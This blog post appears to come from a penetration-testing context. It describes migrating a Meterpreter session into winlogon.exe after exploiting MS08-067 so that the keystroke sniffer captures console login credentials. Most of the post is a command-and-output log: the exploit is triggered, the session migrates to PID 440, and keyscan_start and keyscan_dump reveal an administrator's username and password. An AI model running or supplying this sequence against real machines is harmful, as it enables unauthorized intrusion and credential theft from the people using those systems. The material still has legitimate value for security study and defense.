In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's keystrokes.

While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user's keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target's console. The example below demonstrates this process:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
PID Name Path                                                                                         
--- ---- ----                                                                                         
292   wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe                                                              
316   Explorer.EXE  C:\WINDOWS\Explorer.EXE                                                                      
356   smss.exe      \SystemRoot\System32\smss.exe                                                                
416   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe                                                            
440   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe                                                         
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440...
[*] Migration completed successfully.
meterpreter > keyscan_start 
Starting the keystroke sniffer...
[ wait for user login ]
meterpreter > keyscan_dump 
Dumping captured keystrokes...
Administrator <Tab>  s3cretp4ss <Return>